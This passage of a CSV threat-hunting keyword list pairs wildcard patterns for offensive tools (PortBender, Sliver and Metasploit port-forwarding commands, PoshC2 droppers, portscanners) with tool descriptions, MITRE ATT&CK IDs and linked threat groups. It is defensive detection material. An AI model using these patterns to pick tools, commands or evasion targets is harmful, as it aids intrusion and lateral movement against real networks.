!,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*port_forward_pivot.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*PortBender backdoor*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 
- T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender redirect*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,0,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.cna*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic 
,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.cpp*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*portbender.dll*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.exe*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.h*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.sln*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*PortBender.zip*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*portfwd add ?l *-p *-r *,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Port forwarding,10,10,N/A,N/A,N/A,N/A -*portfwd add --bind *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*portfwd add -r *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*portscan*,offensive_tool_keyword,portscan,A simple TCP and UDP portscanner written in Go,T1595 - T1596 - T1594,TA0007 - TA0009,N/A,N/A,Information Gathering,https://github.com/zs5460/portscan,1,0,N/A,N/A,1,13,4,2022-11-11T09:26:47Z,2019-06-04T09:00:00Z 
-*portscan.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*portscan_result.cna*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*portscan386 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*portscan64 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*PortScan-Alive*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*portscanner.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*portscanner.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Portscan-Port*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*portScanWithService.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of 
Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*portScanWithService.py*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*portswigger.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*portswigger.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*posh_in_mem*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*posh_stageless.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Posh_v4_dropper_*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - 
HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Posh_v4_x64_*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Posh_v4_x86_*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*PoshC2-*.zip*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
